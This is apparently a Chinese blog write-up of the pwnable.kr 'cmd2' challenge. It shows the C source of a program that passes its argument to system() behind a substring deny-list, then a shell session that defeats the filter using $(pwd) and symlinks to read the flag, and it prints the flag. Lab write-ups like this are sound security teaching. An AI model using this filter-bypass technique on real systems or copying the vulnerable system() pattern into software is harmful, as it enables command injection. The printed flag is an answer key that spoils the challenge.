  • #pwnable#cmd2

    cmd2@pwnable:~$ cat cmd2.c
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    
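    /*
     * Count how many deny-listed substrings occur in cmd.
     *
     * Returns the number of patterns found (0 means the command passes).
     * A NULL cmd is treated as blocked (returns 1) instead of being handed
     * to strstr(), which would be undefined behaviour.
     *
     * This is a plain substring deny-list, not a shell parser: it only sees
     * the literal bytes of the argument, so anything the shell later expands
     * from bytes outside the list is invisible to it. A result of 0 is not
     * evidence that the command is harmless.
     */
    int filter(char *cmd) {
        static const char *const banned[] = {
            "=", "PATH", "export", "/", "`", "flag",
        };
        if (cmd == NULL) {
            return 1;
        }
        int hits = 0;
        for (size_t i = 0; i < sizeof banned / sizeof banned[0]; i++) {
            if (strstr(cmd, banned[i]) != NULL) {
                hits++;
            }
        }
        return hits;
    }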
    
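    extern char **environ;

    /*
     * Overwrite every inherited environment string with NUL bytes, in place.
     *
     * Only the string contents are cleared; the environ array itself is left
     * untouched, so each entry still points at a now-empty string. A NULL
     * environ (no environment block at all) is tolerated rather than
     * dereferenced.
     */
    void delete_env(void) {
        if (environ == NULL) {
            return;
        }
        for (char **entry = environ; *entry != NULL; entry++) {
            memset(*entry, 0, strlen(*entry));
        }
    }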
    
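    /*
     * Echo argv[1] and hand it to the shell, after wiping the inherited
     * environment and installing a fixed PATH.
     *
     * Exit status is always 0, whether the argument was missing, rejected by
     * filter(), or executed. envp is unused: the environment is reached
     * through environ in delete_env().
     *
     * NOTE: system() runs an unvalidated argument and the only guard is the
     * substring deny-list in filter(). That is this program's deliberate
     * behaviour; it is not a pattern to copy for running user-supplied
     * commands.
     */
    int main(int argc, char *argv[], char **envp) {
        (void)envp;
        delete_env();
        /* putenv() keeps a pointer to its argument rather than copying it;
         * a string literal has static storage, so that is safe here. */
        putenv("PATH=/no_command_execution_until_you_become_a_hacker");
        /* argv[1] is NULL when no argument was given; never pass that on. */
        if (argc < 2 || argv[1] == NULL) {
            return 0;
        }
        if (filter(argv[1])) {
            return 0;
        }
        printf("%s\n", argv[1]);
        /* Flush before forking the shell so the echo is not left in the
         * parent's stdio buffer and reordered behind the child's output. */
        fflush(stdout);
        (void)system(argv[1]);
        return 0;
    }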
    

    解题过程:

    cmd2@pwnable:/$ pwd
    /
    cmd2@pwnable:/$ /home/cmd2/cmd2 "$(pwd)bin$(pwd)cat $(pwd)home$(pwd)cmd2$(pwd)flag
    > ^C
    cmd2@pwnable:/$ /home/cmd2/cmd2 "$(pwd)bin$(pwd)cat $(pwd)home$(pwd)cmd2$(pwd)flag"
    cmd2@pwnable:/$ /home/cmd2/cmd2 "$(pwd)bin$(pwd)cat $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc"
    cmd2@pwnable:/$ /home/cmd2/cmd2 "$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc"
    cmd2@pwnable:/$ /home/cmd2
    cmd2/ cmd2_pwn/ 
    cmd2@pwnable:/$ /home/cmd2/cmd2 'test'
    test
    cmd2@pwnable:/$ /home/cmd2/cmd2 "$(pwd)"
    cmd2@pwnable:/$ /home/cmd2/cmd2 '"$(pwd)"'
    "$(pwd)"
    sh: 1: /: Permission denied
    cmd2@pwnable:/$ /home/cmd2/cmd2 '"$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc"'
    "$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc"
    sh: 1: /tmp/gwcmd2/bbb /tmp/gwcmd2/ccc: not found
    cmd2@pwnable:/$ ls /tmp/gwcmd2/
    aaaaa bbb ccc
    cmd2@pwnable:/$ ls /tmp/gwcmd2/ -al
    total 342244
    drwxrwxr-x 2 cmd2 cmd2 4096 Mar 26 11:05 .
    drwxrwx-wt 1708 root root 350445568 Mar 26 11:34 ..
    lrwxrwxrwx 1 cmd2 cmd2 15 Mar 26 11:05 aaaaa -> /home/cmd2/cmd2
    lrwxrwxrwx 1 cmd2 cmd2 8 Mar 26 11:05 bbb -> /bin/cat
    lrwxrwxrwx 1 cmd2 cmd2 15 Mar 26 11:05 ccc -> /home/cmd2/flag
    cmd2@pwnable:/$ ./tmp/gwcmd2/bbb 'test'
    ./tmp/gwcmd2/bbb: test: No such file or directory
    cmd2@pwnable:/$ /home/cmd2/cmd2 '""$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc""'
    ""$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc""
    FuN_w1th_5h3ll_v4riabl3s_haha
    cmd2@pwnable:/$ /home/cmd2/cmd2 ""$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc""
    cmd2@pwnable:/$ /home/cmd2/cmd2 '$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc'
    $(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc
    FuN_w1th_5h3ll_v4riabl3s_haha
    

    必须要 '"" xxx ""' 才能被正确执行?
    ""xx"" 会被过滤
    '"xx"' 提示 not found
    ' ' 也可以哦
    所以要用单引号,否则可能内容被解释了。

    不过能想到切换根目录,用 $(pwd) 绕过 '/' 的思路,也是够牛逼了,还要懂特殊的shell命令格式。





  • 原文地址:https://www.cnblogs.com/handt/p/12590199.html